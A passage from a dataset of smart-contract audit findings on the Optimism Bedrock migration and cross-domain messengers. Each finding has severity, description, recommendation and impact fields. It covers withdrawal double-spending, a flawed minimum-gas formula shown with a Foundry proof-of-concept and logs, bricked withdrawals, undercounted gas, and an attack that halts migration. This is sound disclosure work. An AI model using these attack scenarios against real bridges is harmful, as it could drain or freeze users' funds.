THE INNER GAS LIMIT BEING SET TO ZERO\\n []byte(withdrawal.XDomainData),\\n )\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot abi encode relayMessage: %w\", err)\\n }\\n\\n gasLimit := MigrateWithdrawalGasLimit(data)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit), // <= THIS IS THE OUTER GAS LIMIT BEING SET\\n data,\\n )\\n return w, nil\\n}\\n```\\n -Legacy withdrawals can be relayed twice, causing double spending of bridged assetsчhighч`L2CrossDomainMessenger.relayMessage` checks that legacy messages have not been relayed by reading from the `successfulMessages` state variable, however the contract's storage will wiped during the migration to Bedrock and `successfulMessages` will be empty after the 
deployment of the contract. The check will always pass, even if a legacy message have already been relayed using its v0 hash. As a result, random withdrawal messages, as well as messages from malicious actors, can be relayed multiple times during the migration: first, as legacy v0 messages (before the migration); then, as Bedrock v1 messages (during the migration).\\nL2CrossDomainMessenger inherits from CrossDomainMessenger, which inherits from `CrossDomainMessengerLegacySpacer0`, `CrossDomainMessengerLegacySpacer1`, assuming that the contract will be deployed at an address with existing state-the two spacer contracts are needed to \"skip\" the slots occupied by previous implementations of the contract.\\nDuring the migration, legacy (i.e. pre-Bedrock) withdrawal messages will be converted to Bedrock messages-they're expected to call the `relayMessage` function of `L2CrossDomainMessenger`. The `L2CrossDomainMessenger.relayMessage` function checks that the relayed legacy message haven't been relayed already:\\n```\\n// If the message is version 0, then it's a migrated legacy withdrawal. We therefore need\\n// to check that the legacy version of the message has not already been relayed.\\nif (version == 0) {\\n bytes32 oldHash = Hashing.hashCrossDomainMessageV0(_target, _sender, _message, _nonce);\\n require(\\n successfulMessages[oldHash] == false,\\n \"CrossDomainMessenger: legacy withdrawal already relayed\"\\n );\\n}\\n```\\n\\nIt reads a V0 message hash from the `successfulMessages` state variable, assuming that the content of the variable is preserved during the migration. However, the state and storage of all predeployed contracts is wiped during the migration:\\n```\\n// We need to wipe the storage of every predeployed contract EXCEPT for the GovernanceToken,\\n// WETH9, the DeployerWhitelist, the LegacyMessagePasser, and LegacyERC20ETH. 
We have verified\\n// that none of the legacy storage (other than the aforementioned contracts) is accessible and\\n// therefore can be safely removed from the database. Storage must be wiped before anything\\n// else or the ERC-1967 proxy storage slots will be removed.\\nif err := WipePredeployStorage(db); err != nil {\\n return nil, fmt.Errorf(\"cannot wipe storage: %w\", err)\\n}\\n```\\n\\nAlso notice that withdrawals are migrated after predeploys were wiped and deployed-predeploys will have empty storage at the time withdrawals are migrated.\\nMoreover, if we check the code at the `L2CrossDomainMessenger` address of the current version of Optimism, we'll see that the contract's storage layout is different from the layout of the `CrossDomainMessengerLegacySpacer0` and `CrossDomainMessengerLegacySpacer1` contracts: there are no gaps and other spacer slots; `successfulMessages` is the second slot of the contract. Thus, even if there were no wiping, the `successfulMessages` mapping of the new `L2CrossDomainMessenger` contract would still be empty.чConsider cleaning up the storage layout of `L1CrossDomainMessenger`, `L2CrossDomainMessenger` and other proxied contracts.\\nIn the PreCheckWithdrawals function, consider reading withdrawal hashes from the `successfulMessages` mapping of the old `L2CrossDomainMessenger` contract and checking if the values are set. Successful withdrawals should be skipped at this point to filter out legacy withdrawals that have already been relayed.\\nConsider removing the check from the `relayMessage` function, since the check will be useless due to the empty state of the contract.чWithdrawal messages can be relayed twice: once right before and once during the migration. ETH and ERC20 tokens can be withdrawn twice, which is basically double spending of bridged assets.ч```\\n// If the message is version 0, then it's a migrated legacy withdrawal. 
We therefore need\\n// to check that the legacy version of the message has not already been relayed.\\nif (version == 0) {\\n bytes32 oldHash = Hashing.hashCrossDomainMessageV0(_target, _sender, _message, _nonce);\\n require(\\n successfulMessages[oldHash] == false,\\n \"CrossDomainMessenger: legacy withdrawal already relayed\"\\n );\\n}\\n```\\n -The formula used in ````SafeCall.callWithMinGas()```` is wrongчhighчThe formula used in `SafeCall.callWithMinGas()` is not fully complying with EIP-150 and EIP-2929, the actual gas received by the sub-contract can be less than the required `_minGas`. Withdrawal transactions can be finalized with less than specified gas limit, may lead to loss of funds.\\n```\\nFile: contracts\\libraries\\SafeCall.sol\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: \"If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit.\" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the \"Error(string)\" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. 
This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(88, 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173)\\n\\n // Revert with 'Error(\"SafeCall: Not enough gas\")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n return _success;\\n }\\n```\\n\\nThe current formula used in `SafeCall.callWithMinGas()` involves two issues.\\nFirstly, the `63/64` rule is not the whole story of EIP-150 for the `CALL` opcode, let's take a look at the implementation of EIP-150, a `base` gas is subtracted before applying `63/64` rule.\\n```\\nfunc callGas(isEip150 bool, availableGas, base uint64, callCost *uint256.Int) (uint64, error) {\\n if isEip150 {\\n availableGas = availableGas - base\\n gas := availableGas - availableGas/64\\n // If the bit length exceeds 64 bit we know that the newly calculated \"gas\" for EIP150\\n // is smaller than the requested amount. 
Therefore we return the new gas instead\\n // of returning an error.\\n if !callCost.IsUint64() || gas < callCost.Uint64() {\\n return gas, nil\\n }\\n }\\n if !callCost.IsUint64() {\\n return 0, ErrGasUintOverflow\\n }\\n\\n return callCost.Uint64(), nil\\n}\\n```\\n\\nThe `base` gas is calculated in `gasCall()` of `gas_table.go`, which is subject to\\n```\\n(1) L370~L376: call to a new account\\n(2) L377~L379: call with non zero value\\n(3) L380~L383: memory expansion\\n```\\n\\nThe `(1)` and `(3)` are irrelevant in this case, but `(2)` should be taken into account.\\n```\\nFile: core\\vm\\gas_table.go\\nfunc gasCall(evm *EVM, contract *Contract, stack *Stack, mem *Memory, memorySize uint64) (uint64, error) {\\n var (\\n gas uint64\\n transfersValue = !stack.Back(2).IsZero()\\n address = common.Address(stack.Back(1).Bytes20())\\n )\\n if evm.chainRules.IsEIP158 {\\n if transfersValue && evm.StateDB.Empty(address) {\\n gas += params.CallNewAccountGas\\n }\\n } else if !evm.StateDB.Exist(address) {\\n gas += params.CallNewAccountGas\\n }\\n if transfersValue {\\n gas += params.CallValueTransferGas\\n }\\n memoryGas, err := memoryGasCost(mem, memorySize)\\n if err != nil {\\n return 0, err\\n }\\n var overflow bool\\n if gas, overflow = math.SafeAdd(gas, memoryGas); overflow {\\n return 0, ErrGasUintOverflow\\n }\\n\\n evm.callGasTemp, err = callGas(evm.chainRules.IsEIP150, contract.Gas, gas, stack.Back(0))\\n if err != nil {\\n return 0, err\\n }\\n if gas, overflow = math.SafeAdd(gas, evm.callGasTemp); overflow {\\n return 0, ErrGasUintOverflow\\n }\\n return gas, nil\\n}\\n```\\n\\nThe `raw` extra gas for transferring value is\\n```\\nparams.CallValueTransferGas - params.CallStipend * 64 / 63 = 9000 - 2300 * 64 / 63 = 6664\\n```\\n\\nSecondly, EIP-2929 also affects the gas cost of `CALL` opcode.\\n```\\nFile: core\\vm\\operations_acl.go\\n gasCallEIP2929 = makeCallVariantGasCallEIP2929(gasCall)\\n\\nFile: core\\vm\\operations_acl.go\\nfunc 
makeCallVariantGasCallEIP2929(oldCalculator gasFunc) gasFunc {\\n return func(evm *EVM, contract *Contract, stack *Stack, mem *Memory, memorySize uint64) (uint64, error) {\\n addr := common.Address(stack.Back(1).Bytes20())\\n // Check slot presence in the access list\\n warmAccess := evm.StateDB.AddressInAccessList(addr)\\n // The WarmStorageReadCostEIP2929 (100) is already deducted in the form of a constant cost, so\\n // the cost to charge for cold access, if any, is Cold - Warm\\n coldCost := params.ColdAccountAccessCostEIP2929 - params.WarmStorageReadCostEIP2929\\n if !warmAccess {\\n evm.StateDB.AddAddressToAccessList(addr)\\n // Charge the remaining difference here already, to correctly calculate available\\n // gas for call\\n if !contract.UseGas(coldCost) {\\n return 0, ErrOutOfGas\\n }\\n }\\n // Now call the old calculator, which takes into account\\n // - create new account\\n // - transfer value\\n // - memory expansion\\n // - 63/64ths rule\\n gas, err := oldCalculator(evm, contract, stack, mem, memorySize)\\n if warmAccess || err != nil {\\n return gas, err\\n }\\n // In case of a cold access, we temporarily add the cold charge back, and also\\n // add it to the returned gas. 
By adding it to the return, it will be charged\\n // outside of this function, as part of the dynamic gas, and that will make it\\n // also become correctly reported to tracers.\\n contract.Gas += coldCost\\n return gas + coldCost, nil\\n }\\n}\\n```\\n\\nHere is a test script to show the impact of the two aspects mentioned above\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.15;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"forge-std/console.sol\";\\n\\nlibrary SafeCall {\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n uint256 gasSent;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: \"If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit.\" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the \"Error(string)\" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. 
As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(\\n 88,\\n 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173\\n )\\n\\n // Revert with 'Error(\"SafeCall: Not enough gas\")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n gasSent := gas() // @audit this operation costs 2 gas\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n console.log(\"gasSent =\", gasSent);\\n return _success;\\n }\\n}\\n\\ncontract Callee {\\n fallback() external payable {\\n uint256 gas = gasleft();\\n console.log(\"gasReceived =\", gas);\\n }\\n}\\n\\ncontract Caller {\\n function execute(\\n address _target,\\n uint256 _minGas,\\n bytes memory _calldata\\n ) external payable {\\n SafeCall.callWithMinGas(_target, _minGas, msg.value, _calldata);\\n }\\n}\\n\\ncontract TestCallWithMinGas is Test {\\n address callee;\\n Caller caller;\\n\\n function setUp() public {\\n callee = address(new Callee());\\n caller = new Caller();\\n }\\n\\n function testCallWithMinGas() public {\\n console.log(\"-------1st call------\");\\n caller.execute{gas: 64_855}(callee, 63_000, \"\");\\n\\n console.log(\"\\n -------2nd call------\");\\n caller.execute{gas: 64_855}(callee, 63_000, \"\");\\n\\n console.log(\"\\n -------3rd call------\");\\n caller.execute{gas: 62_555, value: 
1}(callee, 63_000, \"\");\\n }\\n}\\n```\\n\\nAnd the log would be\\n```\\nRunning 1 test for test/TestCallWithMinGas.sol:TestCallWithMinGas\\n[PASS] testCallWithMinGas() (gas: 36065)\\nLogs:\\n -------1st call------\\n gasReceived = 60582\\n gasSent = 64200\\n\\n -------2nd call------\\n gasReceived = 63042\\n gasSent = 64200\\n\\n -------3rd call------\\n gasReceived = 56483\\n gasSent = 64200\\n```\\n\\nThe difference between `1st call` and `2nd call` is caused by EIP-2929, and the difference between `2nd call` and `3rd call` is caused by transferring value. We can see the actual received gas in the sub-contract is less than the 63,000 `_minGas` limit in both 1st and `3rd call`.чThe migration logic may look like\\n```\\nif (_value == 0) {\\n gasleft() >= ((_minGas + 200) * 64) / 63 + 2600\\n} else {\\n gasleft() >= ((_minGas + 200) * 64) / 63 + 2600 + 6700\\n}\\n```\\nч`SafeCall.callWithMinGas()` is a key design to ensure withdrawal transactions will be executed with more gas than the limit specified by users. This issue breaks the specification. 
Finalizing withdrawal transactions with less than specified gas limit may fail unexpectedly due to out of gas, lead to loss of funds.ч```\\nFile: contracts\\libraries\\SafeCall.sol\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: \"If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit.\" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the \"Error(string)\" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(88, 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173)\\n\\n // Revert with 'Error(\"SafeCall: Not enough gas\")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. 
This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n return _success;\\n }\\n```\\n -CrossDomainMessenger does not successfully guarantee replayability, can lose user fundsчmediumчWhile `SafeCall.callWithMinGas` successfully ensures that the called function will not revert, it does not ensure any remaining buffer for continued execution on the calling contract.\\nAs a result, there are situations where `OptimismPortal` can be called with an amount of gas such that the remaining gas after calling `L1CrossDomainMessenger` is sufficient to finalize the transaction, but such that the remaining gas after `L1CrossDomainMessenger` makes its call to target is insufficient to mark the transaction as successful or failed.\\nIn any of these valid scenarios, users who withdraw using the L1CrossDomainMessenger (expecting replayability) will have their withdrawals bricked, permanently losing their funds.\\nWhen a user performs a withdrawal with the `L1CrossDomainMessenger`, they include a `gasLimit` value, which specifies the amount of gas that is needed for the function to execute on L1.\\nThis value is translated into two separate values:\\nThe `OptimismPortal` sends at least baseGas(_message, _minGasLimit) = 64/63 * `_minGasLimit` + 16 * data.length + 200_000 to `L1CrossDomainMessenger`, which accounts for the additional overhead used by the Cross Domain Messenger.\\nThe `L1CrossDomainMessenger` sends at least `_minGasLimit` to the target contract.\\nThe core of this 
vulnerability is in the fact that, if:\\n`OptimismPortal` retains sufficient gas after its call to complete the transaction, and\\n`L1CrossDomainMessenger` runs out of gas after its transaction is complete (even if the tx succeeded)\\n...then the result will be that the transaction is marked as finalized in the Portal (disallowing it from being called again), while the Cross Domain Messenger transaction will revert, causing the target transaction to revert and not setting it in `failedMessages` (disallowing it from being replayed). The result is that the transaction will be permanently stuck.\\nCalculations\\nLet's run through the math to see how this might unfold. We will put aside the additional gas allocated for calldata length, because this amount is used up in the call and doesn't materially impact the calculations.\\nWhen the `OptimismPortal` calls the `L1CrossDomainMessenger`, it is enforced that the gas sent will be greater than or equal to `_minGasLimit * 64/63 + 200_000`.\\nThis ensures that the remaining gas for the `OptimismPortal` to continue execution after the call is at least `_minGasLimit / 64 + 3125`. Even assuming that `_minGasLimit == 0`, this is sufficient for `OptimismPortal` to complete execution, so we can safely say that any time `OptimismPortal.finalizeWithdrawalTransaction()` is called with sufficient gas to pass the `SafeCall.callWithMinGas()` check, it will complete execution.\\nMoving over to `L1CrossDomainMessenger`, our call begins with at least `_minGasLimit * 64/63 + 200_000` gas. By the time we get to the external call, we have remaining gas of at least `_minGasLimit * 64/63 + 158_998`. 
This leaves us with the following guarantees:\\nGas available for the external call will be at least 63/64ths of that, which equals `_minGasLimit + 156_513`.\\nGas available for continued execution after the call will be at least 1/64th of that, which equals `_minGasLimit * 1/63 + 3125`.\\nThe additional gas required to mark the transaction as `failedMessages[versionedHash] = true` and complete the rest of the execution is `23,823`.\\nTherefore, in any situation where the external call uses all the available gas will revert if `_minGasLimit * 1/63 + 3125 < 23_823`, which simplifies to `_minGasLimit < 1_303_974`. In other words, in most cases.\\nHowever, it should be unusual for the external call to use all the available gas. In most cases, it should only use `_minGasLimit`, which would leave `156_513` available to resolve this issue.\\nSo, let's look at some examples of times when this may not be the case.\\nAt Risk Scenarios\\nThere are several valid scenarios where users might encounter this issue, and have their replayable transactions stuck:\\nUser Sends Too Little Gas\\nThe expectation when using the Cross Domain Messenger is that all transactions will be replayable. Even if the `_minGasLimit` is set incorrectly, there will always be the opportunity to correct this by replaying it yourself with a higher gas limit. 
In fact, it is a core tenet of the Cross Domain Messengers that they include replay protection for failed transactions.\\nHowever, if a user sets a gas limit that is too low for a transaction, this issue may result.\\nThe consequence is that, while users think that Cross Domain Messenger transactions are replayable and gas limits don't need to be set precisely, they can in fact lose their entire withdrawal if they set their gas limit too low, even when using the \"safe\" Standard Bridge or Cross Domain Messenger.\\nTarget Contract Uses More Than Minimum Gas\\nThe checks involved in this process ensure that sufficient gas is being sent to a contract, but there is no requirement that that is all the gas a contract uses.\\n`_minGasLimit` should be set sufficiently high for the contract to not revert, but that doesn't mean that `_minGasLimit` represents the total amount of gas the contract uses.\\nAs a silly example, let's look at a modified version of the `gas()` function in your `Burn.sol` contract:\\n```\\nfunction gas(uint256 _amountToLeave) internal view {\\n uint256 i = 0;\\n while (gasleft() > _amountToLeave) {\\n ++i;\\n }\\n}\\n```\\n\\nThis function runs until it leaves a specified amount of gas, and then returns. 
While the amount of gas sent to this contract could comfortably exceed the `_minGasLimit`, it would not be safe to assume that the amount leftover afterwards would equal `startingGas - _minGasLimit`.\\nWhile this is a contrived example, the point is that there are many situations where it is not safe to assume that the minimum amount of gas a function needs will be greater than the amount it ends up using, if it is provided with extra gas.\\nIn these cases, the assumption that our leftover gas after the function runs will be greater than the required 1/64th does not hold, and the withdrawal can be bricked.ч`L1CrossDomainMessenger` should only send `_minGasLimit` along with its call to the target (rather than gas()) to ensure it has sufficient leftover gas to ensure replayability.чIn certain valid scenarios where users decide to use the \"safe\" Cross Domain Messenger or Standard Bridge with the expectation of replayability, their withdrawals from L2 to L1 can be bricked and permanently lost.ч```\\nfunction gas(uint256 _amountToLeave) internal view {\\n uint256 i = 0;\\n while (gasleft() > _amountToLeave) {\\n ++i;\\n }\\n}\\n```\\n -Gas usage of cross-chain messages is undercounted, causing discrepancy between L1 and L2 and impacting intrinsic gas calculationчmediumчGas consumption of messages sent via CrossDomainMessenger (including both L1CrossDomainMessenger and L2CrossDomainMessenger) is calculated incorrectly: the gas usage of the \"relayMessage\" wrapper is not counted. As a result, the actual gas consumption of sending a message will be higher than expected. Users will pay less for gas on L1, and L2 blocks may be filled earlier than expected. This will also affect gas metering via ResourceMetering: metered gas will be lower than actual consumed gas, and the EIP-1559-like gas pricing mechanism won't reflect the actual demand for gas.\\nThe CrossDomainMessenger.sendMessage function is used to send cross-chain messages. 
Users are required to set the `_minGasLimit` argument, which is the expected amount of gas that the message will consume on the other chain. The function also computes the amount of gas required to pass the message to the other chain: this is done in the `baseGas` function, which computes the byte-wise cost of the message. `CrossDomainMessenger` also allows users to replay their messages on the destination chain if they failed: to allow this, the contract wraps user messages in `relayMessage` calls. This increases the size of messages, but the `baseGas` call above counts gas usage of only the original, not wrapped in the `relayMessage` call, message.\\nThis contradicts the intrinsic gas calculation in `op-geth`, which calculates gas of an entire message data:\\n```\\ndataLen := uint64(len(data))\\n// Bump the required gas by the amount of transactional data\\nif dataLen > 0 {\\n // rest of code\\n}\\n```\\n\\nThus, there's a discrepancy between the contract and the node, which will result in the node consuming more gas than users paid for.\\nThis behaviour also disagrees with how the migration process works:\\nwhen migrating pre-Bedrock withdrawals, `data` is the entire messages, including the `relayMessage` calldata;\\nthe gas limit of migrated messages is computed on the entire `data`.\\nTaking into account the logic of paying cross-chain messages' gas consumption on L1, I think the implementation in the migration code is correct and the implementation in `CrossDomainMessenger` is wrong: users should pay for sending the entire cross-chain message, not just the calldata that will be execute on the recipient on the other chain.чWhen counting gas limit in the `CrossDomainMessenger.sendMessage` function, consider counting the entire message, including the `relayMessage` calldata wrapping. 
Consider a change like that:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol b/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\nindex f67021010..5239feefd 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\n@@ // Remove the line below\\n253,19 // Add the line below\\n253,20 @@ abstract contract CrossDomainMessenger is\\n // message is the amount of gas requested by the user PLUS the base gas value. We want to\\n // guarantee the property that the call to the target contract will always have at least\\n // the minimum gas limit specified by the user.\\n// Add the line below\\n bytes memory wrappedMessage = abi.encodeWithSelector(\\n// Add the line below\\n this.relayMessage.selector,\\n// Add the line below\\n messageNonce(),\\n// Add the line below\\n msg.sender,\\n// Add the line below\\n _target,\\n// Add the line below\\n msg.value,\\n// Add the line below\\n _minGasLimit,\\n// Add the line below\\n _message\\n// Add the line below\\n );\\n _sendMessage(\\n OTHER_MESSENGER,\\n// Remove the line below\\n baseGas(_message, _minGasLimit),\\n// Add the line below\\n baseGas(wrappedMessage, _minGasLimit),\\n msg.value,\\n// Remove the line below\\n abi.encodeWithSelector(\\n// Remove the line below\\n this.relayMessage.selector,\\n// Remove the line below\\n messageNonce(),\\n// Remove the line below\\n msg.sender,\\n// Remove the line below\\n _target,\\n// Remove the line below\\n msg.value,\\n// Remove the line below\\n _minGasLimit,\\n// Remove the line below\\n _message\\n// Remove 
the line below\\n )\\n// Add the line below\\n wrappedMessage\\n );\\n\\n emit SentMessage(_target, msg.sender, _message, messageNonce(), _minGasLimit);\\n```\\nчSince the `CrossDomainMessenger` contract is recommended to be used as the main cross-chain messaging contract and since it's used by both L1 and L2 bridges (when bridging ETH or ERC20 tokens), the undercounted gas will have a broad impact on the system. It'll create a discrepancy in gas usage and payment on L1 and L2: on L1, users will pay for less gas than actually will be consumed by cross-chain messages.\\nAlso, since messages sent from L1 to L2 (via OptimismPortal.depositTransaction) are priced using an EIP-1559-like mechanism (via ResourceMetering._metered), the mechanism will fail to detect the actual demand for gas and will generally set lower gas prices, while actual gas consumption will be higher.\\nThe following bytes are excluded from gas usage counting:\\nthe 4 bytes of the `relayMessage` selector;\\nthe 32 bytes of the message nonce;\\nthe address of the sender (20 bytes);\\nthe address of the recipient (20 bytes);\\nthe amount of ETH sent with the message (32 bytes);\\nthe minimal gas limit of the nested message (32 bytes).\\nThus, every cross-chain message sent via the bridge or the messenger will contain 140 bytes that won't be paid by users. The bytes will however be processed by the node and accounted in the gas consumption.ч```\\ndataLen := uint64(len(data))\\n// Bump the required gas by the amount of transactional data\\nif dataLen > 0 {\\n // rest of code\\n}\\n```\\n -Malicious actor can prevent migration by calling a non-existing function in `OVM_L2ToL1MessagePasser` and making `ReadWitnessData` return an errorчmediumчThere is a mismatch between collected witness data in l2geth to the parsing of the collected data during migration. 
The mismatch will return an error and halt the migration until the data is cleaned.\\nWitness data is collected from L2geth using a state dumper that collects any call to `OVM_L2ToL1MessagePasser`. The data is collected regardless of the calldata itself. Any call to `OVM_L2ToL1MessagePasser` will be collected. The data will persist regardless of the status of the transaction.\\n```\\n func (evm *EVM) Call(caller ContractRef, addr common.Address, input []byte, gas uint64, value *big.Int) (ret []byte, leftOverGas uint64, err error) { \\n if addr == dump.MessagePasserAddress { \\n statedumper.WriteMessage(caller.Address(), input) \\n } \\n```\\n\\nThe data will be stored in a file in the following format: \"MSG||\"\\nAt the start of the migration process, in order to unpack the message from the calldata, the code uses the first 4 bytes to look up the selector of `passMessageToL1` from the calldata and unpack the calldata according to the ABI.\\n```\\n method, err := abi.MethodById(msgB[:4])\\n if err != nil {\\n return nil, nil, fmt.Errorf(\"failed to get method: %w\", err)\\n }\\n\\n out, err := method.Inputs.Unpack(msgB[4:])\\n if err != nil {\\n return nil, nil, fmt.Errorf(\"failed to unpack: %w\", err)\\n }\\n```\\n\\nAs can be seen above, the function will return an error that is bubbled up to stop the migration if:\\nThe calldata first 4 bytes is not a selector of a function from the ABI of `OVM_L2ToL1MessagePasser`\\nThe parameters encoded with the selectors are not unpackable (are not the parameters specified by the ABI)\\nA malicious actor will call any non-existing function in the address of `OVM_L2ToL1MessagePasser`. The message will be stored in the witness data and cause an error during migration.\\n`ReadWitnessData` is called to parse the json witness data before any filtering is in place.чInstead of bubbling up an error, simply continue to the next message. 
This shouldn't cause a problem since in the next stages of the migration there are checks to validate any missing messages from the storage.чAn arbitrary user can halt the migration processч```\\n func (evm *EVM) Call(caller ContractRef, addr common.Address, input []byte, gas uint64, value *big.Int) (ret []byte, leftOverGas uint64, err error) { \\n if addr == dump.MessagePasserAddress { \\n statedumper.WriteMessage(caller.Address(), input) \\n } \\n```\\n -Causing users lose fund if bridging long message from L2 to L1 due to uncontrolled out-of-gas errorчmediumчIf the amount of gas provided during finalizing withdrawal transactions passes the check in `callWithMinGas`, it is not guaranteed that the relaying message transaction does not go out of gas. This can happen if the bridged message from L2 to L1 is long enough to increase the gas consumption significantly so that the predicted `baseGas` is not accurate enough.\\nSo far so good.\\nAs a result, while the transaction `OptimismPortal.finalizeWithdrawalTransaction` sets the flag `finalizedWithdrawals[withdrawalHash]` as `true`, the flags `failedMessages[versionedHash]` and `successfulMessages[versionedHash]` are `false`. 
So, the users can not replay their message, and his fund is lost.\\nThe question is that is there any possibility that `L1CrossDomainMessenger` reverts due to OOG, even though the required gas is calculated in L2 in the function `baseGas`?\\nSo, the amount of gas available to `L1CrossDomainMessenger` will be: `(G - K1 - 51)*(63/64)` Please note this number is based on the estimation of gas consumption explained in the comment:\\n// Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call // frame may be passed to a subcontext, we need to ensure that the gas will not be // truncated to hold this function's invariant: \"If a call is performed by // `callWithMinGas`, it must receive at least the specified minimum gas limit.\" In // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL` // opcode, so it is factored in with some extra room for error.\\nIn the function `L1CrossDomainMessenger.relayMessage`, some gas will be consumed from line 299 to line 360. For simplicity, I call this amount of gas `K2 + HashingGas`, i.e. the consumed gas is separated for later explanation. In other words, the sum of consumed gas from line 299 to 303 and the consumed gas from line 326 to 360, is called `K2`, and the consumed gas from line 304 to line 325 is called 